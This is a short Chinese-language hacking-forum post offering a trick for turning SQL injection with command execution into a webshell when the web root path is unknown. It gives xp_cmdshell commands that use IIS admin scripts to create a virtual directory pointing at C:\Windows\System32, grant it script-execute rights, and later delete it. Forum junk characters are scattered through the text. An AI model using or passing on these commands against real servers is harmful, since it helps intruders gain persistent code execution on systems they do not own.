|

- 帖子
- 120
- 积分
- 470
- 威望
- 636
- 金钱
- 101
- 在线时间
- 31 小时
   
|
很多情况下我们都会遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,应该算是无意中发现了一招,感觉不错 整理下发上来给大家分享:& d$ }+ K( w- [1 X! I/ E
$ {7 S, F- V, Y. d7 }, s% Xexec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\windows\system32"'- K w9 n3 b, I# w% ~- k, a9 s
建立虚拟目录win,指向c:\windows\system32+ o/ t# @! f5 |4 k) r, Y
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture'# u, ^6 {/ [) ~4 C( Y
让win句有解析asp脚本权限: r1 c+ y. t1 I5 Y$ g$ d
4 w: K! ^2 h- _* w+ E7 J1 mexec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/h4x0r/": w/ S) ^' O' W: L
删除虚拟目录。) ]' i4 ~1 D. E
找不到web绝对路径的一种解决办法,
4 ]; c( c9 d! t$ _ \2 C$ I9 n4 `7 A/ F9 b3 b# v" |
403错误,表示虚拟目录建好了。。 |
-
1
评分人数
-
|